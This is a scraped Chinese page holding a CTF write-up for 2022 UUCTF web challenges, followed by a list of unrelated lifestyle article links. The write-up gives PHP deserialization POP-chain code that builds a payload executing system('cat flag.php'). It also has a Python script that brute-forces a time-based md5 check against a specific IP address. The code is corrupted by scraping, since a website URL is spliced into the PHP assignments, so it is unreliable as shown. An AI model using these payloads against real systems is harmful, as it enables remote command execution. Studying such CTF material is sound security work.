2022UUCTF--WEB( 四 ) _生活百科

POC
<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="phpinfo();";}}echo(base64_encode(serialize(new nothing())));将上面两处的构造的结合起来的payload
<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="phpinfo();";}}$basedata = https://www.huyubaike.com/biancheng/(base64_encode(serialize(new nothing())));$str ='";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';echo $str."\n";$hacker='';for($i=0;$i<strlen($str);$i++){$hacker.='hacker';}$payload = $hacker.$str;echo $payload;执行效果

文章插图
找flag在当前目录的flag.php

<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="system('cat flag.php');";}}$basedata = https://www.huyubaike.com/biancheng/(base64_encode(serialize(new nothing())));$str ='";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';$hacker='';for($i=0;$i<strlen($str);$i++){$hacker.='hacker';}$payload = $hacker.$str;echo $payload;

文章插图
funmd5--对代码的理解打开题目直接源码
重点
if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){echo "well!you win again!now flag is yours.<br>";echo $flag;}我们知道$md5[0]==md5($md5[0])绕过可以使用0e215962017，但是还要绕过preg_replace使用%0a，我们审计代码发现，后面有对md5[0]的截取我们只要保证$sub=1从第一位开始截取，就可以避免%0a，而且$sub的值是当前时间的最后一位，也就是保证当前的时间为xxxxxxxx1即可
$sub=substr($time,-1);$md5[0]=substr($md5[0],$sub);$guessmd5=md5($time);我们使用脚本快速请求就可以在传入md5[1]也是当前时间的md5值两者就相等
脚本

import hashlib,time,requestsdef guess_md5():while True:url = f"http://43.143.7.97:28179/?md5[0]=%0a0e215962017&md5[1]={str(hashlib.md5(str(int(time.time())).encode()).hexdigest())}"resp = requests.get(url=url)if "win" in resp.text:print(resp.text)returntime.sleep(1)guess_md5()

文章插图
backdoor--tonyenc加密

这题我不太会哦没咋理解不是很会使用IDA

hint：backdoor.php是一个后门文件
打开题目说布里茨布里茨就是lol的机器人看robots.txt

文章插图

文章插图
下载源码，发现五个文件大致看下 robots.txtindex.php无信息

文章插图
看看backdoor.php的代码，根据提示他是一个后门文件那肯定是有连接后门的密码的，但是乱码又不知道

文章插图
到了这里属实是没啥思路看wp IDA逆向so文件

so文件是Linux下向当于Windows下的dll文件，Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据

上一页
1
2
3
4
5
下一页

经验总结扩展阅读

牧风芳华|只因在羊群中多看了你一眼

西游梗传图第四十六关通关攻略

黑妹派美白要防患未然

加班的说说心情短语

秋葵是焯水后再切还是切之后再焯水

摸底考试祖传的印第安纹终于没了，说一说我长印第安纹的心酸经历

羊肉不能和什么一起吃这四类常见食品要注意

头皮经常染发容易致癌？医生：染前给你3点建议，能做到就放心染吧

什么你养什么猫，在生活中就是什么性格

葛朗台的性格特点葛朗台拜访严监生

2023年8月29日提车黄道吉日 2023年8月29日适合提车吗

养护佘诗曼机场造型大胆！穿黑T恤腰间绑外套很时髦，44岁减龄如24岁

排骨汤怎样冷藏

厦门哪个小学中学最好

我见过情商最低的行为，是不懂得干脆地拒绝

新高考纯文科可选专业有哪些专业

保温杯可以泡奶茶吗

孩子|心理咨询：你能接受自己的的孩子“平庸”吗？

枸杞桑葚干泡水喝可以吗功效又如何

恐怖：胸部臀部增大男人过量饮啤酒会变女人

2023年最幸福的星座情侣无法抵抗的吸引力

哪些星座女生无法抵挡制服诱惑

12月坠入甜蜜爱情中无法自拔的3星座完美邂逅良缘

电脑无法启动开不了机怎么办（电脑能正常启动但是无法进入系统)

电脑无法开机进不了系统怎么解决（win10开机后假死黑屏)

windows启动不了开不了机怎么办（笔记本无法启动windows)

在爱情中让人无法错过的三大星座女

日久不生情，即使陪伴再久也无法相爱的星座

大S 爆具俊晔打包回韩国，称无法满足大S，已与前女友蔡妍打得火热

失恋后，无法从前任阴影中走出的星座